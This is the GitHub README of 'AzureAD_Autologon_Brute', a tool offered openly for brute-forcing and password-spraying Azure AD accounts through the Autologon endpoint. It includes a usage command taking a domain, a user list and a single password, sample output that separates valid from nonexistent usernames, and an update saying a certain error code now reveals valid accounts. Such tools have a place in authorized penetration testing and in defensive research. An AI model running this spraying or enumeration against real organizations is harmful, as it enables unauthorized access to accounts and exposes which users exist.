Skip to content

nyxgeek/AzureAD_Autologon_Brute

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 

Repository files navigation

AzureAD_Autologon_Brute

Brute force attack tool for Azure AD Autologon

https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/

Update - 2024.02.21

The AADSTS81016 that people were reporting now seems to indicate a valid account.

Thanks to @rootsecdev for validating that password spray functionality still works!

Usage:
python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
[~/AzureAD_Autologon_Brute] # python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
Domain is  intranet.directory
Setting password as: Password1
Reading users from file: users.txt

+-----------------------------------------+
|          AzureAD AutoLogon Brute          |
|     2021.09.30 @nyxgeek - TrustedSec      |
+-----------------------------------------+

[-] Username not found:wumpus@intranet.directory:Password1
[+] VALID USERNAME, invalid password :stephen.falken@intranet.directory:Password1
[-] Username not found:grand.poobah@intranet.directory:Password1
[-] Username not found:thewiz@intranet.directory:Password1
[-] Username not found:bingobongo@intranet.directory:Password1
[-] Username not found:administrator@intranet.directory:Password1
[+] VALID USERNAME, invalid password :david.lightman@intranet.directory:Password1
[-] Username not found:fakeuser123@intranet.directory:Password1
[+] VALID USERNAME, invalid password :nyxgeek@intranet.directory:Password1
[-] Username not found:jabberwocky@intranet.directory:Password1